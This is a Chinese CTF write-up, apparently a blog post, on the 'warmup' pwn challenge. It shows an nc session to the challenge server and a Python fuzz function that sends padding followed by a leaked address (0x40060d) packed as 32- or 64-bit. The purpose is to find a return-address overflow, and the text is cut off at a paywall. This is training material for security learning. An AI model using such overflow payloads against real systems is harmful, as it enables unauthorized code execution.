本文介绍了CTF高手进阶区的warmup题目,重点在于fuzzing技术的应用。通过分析题目提示和程序行为,文章详细展示了如何进行fuzz测试,包括不带地址、32位地址和64位地址的fuzzing方法,并最终成功获取flag,揭示了对未知程序进行简单fuzz过程的关键步骤。
题目地址:warmup
这是高手进阶区的第三题,我们先看下题目内容
这个题目没有附件,那就是要fuzz的题目了,我们先正常走一下程序看看
root@mypwn:/ctf/work/python/warmup# nc 111.198.29.45 32453
-Warm Up-
WOW:0x40060d
>AAA这个题目的出发点就是要大家做fuzz,看下提示内容有个地址0x40060d,那就是说fuzz的时候要带上地址/或者不带地址。
先给出fuzz的函数
addr = 0x40060d
def send_fuzz(p, num, type):
payload = 'A'*num
if type == 1:
payload += p32(addr)
if type == 2:
payload += p64(addr)
p.sendlineafter('>', payload)
这里分成3种类型:不带地址,带32位地址,带64位地址
根据fuzz函数,构造fuzz带python脚本:
最低0.47元/天 解锁文章
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
